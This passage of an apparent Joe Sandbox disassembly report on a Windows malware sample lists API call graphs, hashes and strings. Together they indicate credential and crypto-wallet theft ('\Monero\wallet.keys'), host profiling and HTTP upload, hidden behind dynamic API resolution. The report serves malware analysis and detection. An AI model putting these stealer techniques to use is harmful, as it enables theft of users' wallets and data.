                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 6d98a91b1f50d385b9343dfd4eccc831c1b3bed83d1acb50827c91513672a929
                              • Instruction ID: 5a073ed60d8160fb0d5ad675a441b9453e630bd1c19105168d25fa5f20969356
                              • Opcode Fuzzy Hash: 6d98a91b1f50d385b9343dfd4eccc831c1b3bed83d1acb50827c91513672a929
                              • Instruction Fuzzy Hash: 1541E861FCB708EAC725B7ACA84FD9E76556F49F01F917044ED00A22C0C6F469804FA7

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 de4880-de4942 call dfa7a0 call de47b0 call dfa740 * 5 InternetOpenA StrCmpCA 816 de494b-de494f 801->816 817 de4944 801->817 818 de4ecb-de4ef3 InternetCloseHandle call dfaad0 call de9ac0 816->818 819 de4955-de4acd call df8b60 call dfa920 call dfa8a0 call dfa800 * 2 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa920 call dfa8a0 call dfa800 * 2 InternetConnectA 816->819 817->816 829 de4ef5-de4f2d call dfa820 call dfa9b0 call dfa8a0 call dfa800 818->829 830 de4f32-de4fa2 call df8990 * 2 call dfa7a0 call dfa800 * 8 818->830 819->818 905 de4ad3-de4ad7 819->905 829->830 906 de4ad9-de4ae3 905->906 907 de4ae5 905->907 908 de4aef-de4b22 HttpOpenRequestA 906->908 907->908 909 de4ebe-de4ec5 InternetCloseHandle 908->909 910 de4b28-de4e28 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa740 call dfa920 * 2 call dfa8a0 call dfa800 * 2 call dfaad0 lstrlen call dfaad0 * 2 lstrlen call dfaad0 HttpSendRequestA 908->910 909->818 1021 de4e32-de4e5c InternetReadFile 910->1021 1022 de4e5e-de4e65 1021->1022 1023 de4e67-de4eb9 InternetCloseHandle call dfa800 1021->1023 1022->1023 1024 de4e69-de4ea7 call dfa9b0 call dfa8a0 call dfa800 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE4915
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E00DDB,00000000,?,?,00000000,?,",00000000,?,0197F0A8), ref: 00DE4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00DE4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00DE4EC5
                              • HttpOpenRequestA.WININET(00000000,0197F148,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE4B15
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00DE4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                              • Instruction ID: 8091c23c60feb5a8c3bac10016096318978e3986fe67815c1896da0bb4d100cd
                              • Opcode Fuzzy Hash: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                              • Instruction Fuzzy Hash: 7212DCB191021CAADB15EB94DC92FEEB378EF54340F5581A9B20A66091DFB02F49CF71
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                              • Instruction ID: b480fa98abc5c20da14bbe751e36b7d0fa4a2222d3c9910be5d0655ce6ad7f0d
                              • Opcode Fuzzy Hash: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                              • Instruction Fuzzy Hash: 5C01A9B1A04209EFC710DF94DD45FAEBBB8F704B21F11421AFA45E3680C7B959048BB1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                              • Instruction ID: 5a448d23c658373e77c34eb349424558cb154523492d71a329491e973fe496e7
                              • Opcode Fuzzy Hash: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                              • Instruction Fuzzy Hash: AFF04FB1E44208EFC724DF98D949FAEBBB8FB04721F10065AFA45A3680C7B955048BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                              • Instruction ID: 50da218900c40e776c324182e9162bc9c570d019105f0ecda21c70c5030fa801
                              • Opcode Fuzzy Hash: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                              • Instruction Fuzzy Hash: B9D05E74A0030CDBCB20EFE0DC496EDBBB8FB08311F100554D90663740EA315481CBA9

                              Control-flow Graph
                              control_flow_graph 633 df9c10-df9c1a 634 dfa036-dfa0ca LoadLibraryA * 8 633->634 635 df9c20-dfa031 GetProcAddress * 43 633->635 636 dfa0cc-dfa141 GetProcAddress * 5 634->636 637 dfa146-dfa14d 634->637 635->634 636->637 638 dfa216-dfa21d 637->638 639 dfa153-dfa211 GetProcAddress * 8 637->639 640 dfa21f-dfa293 GetProcAddress * 5 638->640 641 dfa298-dfa29f 638->641 639->638 640->641 642 dfa337-dfa33e 641->642 643 dfa2a5-dfa332 GetProcAddress * 6 641->643 644 dfa41f-dfa426 642->644 645 dfa344-dfa41a GetProcAddress * 9 642->645 643->642 646 dfa428-dfa49d GetProcAddress * 5 644->646 647 dfa4a2-dfa4a9 644->647 645->644 646->647 648 dfa4dc-dfa4e3 647->648 649 dfa4ab-dfa4d7 GetProcAddress * 2 647->649 650 dfa515-dfa51c 648->650 651 dfa4e5-dfa510 GetProcAddress * 2 648->651 649->648 652 dfa612-dfa619 650->652 653 dfa522-dfa60d GetProcAddress * 10 650->653 651->650 654 dfa67d-dfa684 652->654 655 dfa61b-dfa678 GetProcAddress * 4 652->655 653->652 656 dfa69e-dfa6a5 654->656 657 dfa686-dfa699 GetProcAddress 654->657 655->654 658 dfa708-dfa709 656->658 659 dfa6a7-dfa703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01965E08), ref: 00DF9C2D
                              • GetProcAddress.KERNEL32(75900000,01965AC8), ref: 00DF9C45
                              • GetProcAddress.KERNEL32(75900000,01978DD8), ref: 00DF9C5E
                              • GetProcAddress.KERNEL32(75900000,01978DA8), ref: 00DF9C76
                              • GetProcAddress.KERNEL32(75900000,0197C8F0), ref: 00DF9C8E
                              • GetProcAddress.KERNEL32(75900000,0197C800), ref: 00DF9CA7
                              • GetProcAddress.KERNEL32(75900000,0196B280), ref: 00DF9CBF
                              • GetProcAddress.KERNEL32(75900000,0197C6E0), ref: 00DF9CD7
                              • GetProcAddress.KERNEL32(75900000,0197C680), ref: 00DF9CF0
                              • GetProcAddress.KERNEL32(75900000,0197C710), ref: 00DF9D08
                              • GetProcAddress.KERNEL32(75900000,0197C890), ref: 00DF9D20
                              • GetProcAddress.KERNEL32(75900000,01965D68), ref: 00DF9D39
                              • GetProcAddress.KERNEL32(75900000,01965D28), ref: 00DF9D51
                              • GetProcAddress.KERNEL32(75900000,01965DA8), ref: 00DF9D69
                              • GetProcAddress.KERNEL32(75900000,01965AE8), ref: 00DF9D82
                              • GetProcAddress.KERNEL32(75900000,0197C6B0), ref: 00DF9D9A
                              • GetProcAddress.KERNEL32(75900000,0197C6F8), ref: 00DF9DB2
                              • GetProcAddress.KERNEL32(75900000,0196B2D0), ref: 00DF9DCB
                              • GetProcAddress.KERNEL32(75900000,01965DC8), ref: 00DF9DE3
                              • GetProcAddress.KERNEL32(75900000,0197C830), ref: 00DF9DFB
                              • GetProcAddress.KERNEL32(75900000,0197C6C8), ref: 00DF9E14
                              • GetProcAddress.KERNEL32(75900000,0197C908), ref: 00DF9E2C
                              • GetProcAddress.KERNEL32(75900000,0197C770), ref: 00DF9E44
                              • GetProcAddress.KERNEL32(75900000,01965DE8), ref: 00DF9E5D
                              • GetProcAddress.KERNEL32(75900000,0197C848), ref: 00DF9E75
                              • GetProcAddress.KERNEL32(75900000,0197C728), ref: 00DF9E8D
                              • GetProcAddress.KERNEL32(75900000,0197C878), ref: 00DF9EA6
                              • GetProcAddress.KERNEL32(75900000,0197C740), ref: 00DF9EBE
                              • GetProcAddress.KERNEL32(75900000,0197C758), ref: 00DF9ED6
                              • GetProcAddress.KERNEL32(75900000,0197C698), ref: 00DF9EEF
                              • GetProcAddress.KERNEL32(75900000,0197C938), ref: 00DF9F07
                              • GetProcAddress.KERNEL32(75900000,0197C860), ref: 00DF9F1F
                              • GetProcAddress.KERNEL32(75900000,0197C950), ref: 00DF9F38
                              • GetProcAddress.KERNEL32(75900000,01979E68), ref: 00DF9F50
                              • GetProcAddress.KERNEL32(75900000,0197C8A8), ref: 00DF9F68
                              • GetProcAddress.KERNEL32(75900000,0197C788), ref: 00DF9F81
                              • GetProcAddress.KERNEL32(75900000,01965E28), ref: 00DF9F99
                              • GetProcAddress.KERNEL32(75900000,0197C7A0), ref: 00DF9FB1
                              • GetProcAddress.KERNEL32(75900000,01965E48), ref: 00DF9FCA
                              • GetProcAddress.KERNEL32(75900000,0197C7B8), ref: 00DF9FE2
                              • GetProcAddress.KERNEL32(75900000,0197C7D0), ref: 00DF9FFA
                              • GetProcAddress.KERNEL32(75900000,01965968), ref: 00DFA013
                              • GetProcAddress.KERNEL32(75900000,01965728), ref: 00DFA02B
                              • LoadLibraryA.KERNEL32(0197C7E8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA03D
                              • LoadLibraryA.KERNEL32(0197C818,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA04E
                              • LoadLibraryA.KERNEL32(0197C8C0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA060
                              • LoadLibraryA.KERNEL32(0197C8D8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA072
                              • LoadLibraryA.KERNEL32(0197C920,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA083
                              • LoadLibraryA.KERNEL32(0197C668,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA095
                              • LoadLibraryA.KERNEL32(0197CBA8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0A7
                              • LoadLibraryA.KERNEL32(0197C9B0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0B8
                              • GetProcAddress.KERNEL32(75FD0000,01965948), ref: 00DFA0DA
                              • GetProcAddress.KERNEL32(75FD0000,0197CBD8), ref: 00DFA0F2
                              • GetProcAddress.KERNEL32(75FD0000,01978930), ref: 00DFA10A
                              • GetProcAddress.KERNEL32(75FD0000,0197CC38), ref: 00DFA123
                              • GetProcAddress.KERNEL32(75FD0000,019656E8), ref: 00DFA13B
                              • GetProcAddress.KERNEL32(73430000,0196AE20), ref: 00DFA160
                              • GetProcAddress.KERNEL32(73430000,01965888), ref: 00DFA179
                              • GetProcAddress.KERNEL32(73430000,0196AFD8), ref: 00DFA191
                              • GetProcAddress.KERNEL32(73430000,0197CB90), ref: 00DFA1A9
                              • GetProcAddress.KERNEL32(73430000,0197CAE8), ref: 00DFA1C2
                              • GetProcAddress.KERNEL32(73430000,019657E8), ref: 00DFA1DA
                              • GetProcAddress.KERNEL32(73430000,019658A8), ref: 00DFA1F2
                              • GetProcAddress.KERNEL32(73430000,0197CB48), ref: 00DFA20B
                              • GetProcAddress.KERNEL32(763B0000,01965AA8), ref: 00DFA22C
                              • GetProcAddress.KERNEL32(763B0000,019657C8), ref: 00DFA244
                              • GetProcAddress.KERNEL32(763B0000,0197C9F8), ref: 00DFA25D
                              • GetProcAddress.KERNEL32(763B0000,0197CB30), ref: 00DFA275
                              • GetProcAddress.KERNEL32(763B0000,01965A28), ref: 00DFA28D
                              • GetProcAddress.KERNEL32(750F0000,0196B1E0), ref: 00DFA2B3
                              • GetProcAddress.KERNEL32(750F0000,0196AFB0), ref: 00DFA2CB
                              • GetProcAddress.KERNEL32(750F0000,0197CAA0), ref: 00DFA2E3
                              • GetProcAddress.KERNEL32(750F0000,01965908), ref: 00DFA2FC
                              • GetProcAddress.KERNEL32(750F0000,01965808), ref: 00DFA314
                              • GetProcAddress.KERNEL32(750F0000,0196AE48), ref: 00DFA32C
                              • GetProcAddress.KERNEL32(75A50000,0197CBC0), ref: 00DFA352
                              • GetProcAddress.KERNEL32(75A50000,01965928), ref: 00DFA36A
                              • GetProcAddress.KERNEL32(75A50000,01978960), ref: 00DFA382
                              • GetProcAddress.KERNEL32(75A50000,0197CBF0), ref: 00DFA39B
                              • GetProcAddress.KERNEL32(75A50000,0197CC08), ref: 00DFA3B3
                              • GetProcAddress.KERNEL32(75A50000,01965A48), ref: 00DFA3CB
                              • GetProcAddress.KERNEL32(75A50000,01965A68), ref: 00DFA3E4
                              • GetProcAddress.KERNEL32(75A50000,0197CB60), ref: 00DFA3FC
                              • GetProcAddress.KERNEL32(75A50000,0197CC20), ref: 00DFA414
                              • GetProcAddress.KERNEL32(75070000,01965788), ref: 00DFA436
                              • GetProcAddress.KERNEL32(75070000,0197CB18), ref: 00DFA44E
                              • GetProcAddress.KERNEL32(75070000,0197CA40), ref: 00DFA466
                              • GetProcAddress.KERNEL32(75070000,0197CB78), ref: 00DFA47F
                              • GetProcAddress.KERNEL32(75070000,0197CA58), ref: 00DFA497
                              • GetProcAddress.KERNEL32(74E50000,01965A88), ref: 00DFA4B8
                              • GetProcAddress.KERNEL32(74E50000,019656C8), ref: 00DFA4D1
                              • GetProcAddress.KERNEL32(75320000,01965748), ref: 00DFA4F2
                              • GetProcAddress.KERNEL32(75320000,0197CA10), ref: 00DFA50A
                              • GetProcAddress.KERNEL32(6F060000,01965848), ref: 00DFA530
                              • GetProcAddress.KERNEL32(6F060000,01965708), ref: 00DFA548
                              • GetProcAddress.KERNEL32(6F060000,019658C8), ref: 00DFA560
                              • GetProcAddress.KERNEL32(6F060000,0197CA70), ref: 00DFA579
                              • GetProcAddress.KERNEL32(6F060000,019657A8), ref: 00DFA591
                              • GetProcAddress.KERNEL32(6F060000,01965988), ref: 00DFA5A9
                              • GetProcAddress.KERNEL32(6F060000,01965768), ref: 00DFA5C2
                              • GetProcAddress.KERNEL32(6F060000,01965828), ref: 00DFA5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00DFA5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00DFA607
                              • GetProcAddress.KERNEL32(74E00000,0197CC50), ref: 00DFA629
                              • GetProcAddress.KERNEL32(74E00000,019789B0), ref: 00DFA641
                              • GetProcAddress.KERNEL32(74E00000,0197C968), ref: 00DFA659
                              • GetProcAddress.KERNEL32(74E00000,0197CA28), ref: 00DFA672
                              • GetProcAddress.KERNEL32(74DF0000,019659A8), ref: 00DFA693
                              • GetProcAddress.KERNEL32(6FAA0000,0197C980), ref: 00DFA6B4
                              • GetProcAddress.KERNEL32(6FAA0000,01965868), ref: 00DFA6CD
                              • GetProcAddress.KERNEL32(6FAA0000,0197C9E0), ref: 00DFA6E5
                              • GetProcAddress.KERNEL32(6FAA0000,0197C998), ref: 00DFA6FD
                              Strings
